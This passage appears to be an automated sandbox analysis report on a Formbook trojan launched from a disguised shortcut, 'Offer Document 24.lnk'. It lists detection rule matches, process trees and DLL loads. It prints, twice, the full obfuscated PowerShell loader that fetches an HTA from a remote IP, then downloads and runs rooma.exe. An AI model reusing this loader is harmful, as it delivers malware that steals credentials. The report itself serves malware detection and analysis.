          Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: rooma.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: rooma.exe.5.drStatic PE information: Section .text
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winLNK@14/15@17/14
          Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].htaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkvo4uk.0pp.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000295D000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.0000000002945000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Offer Document 24.lnkReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.htaJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe" Jump to behavior
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\rooma.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
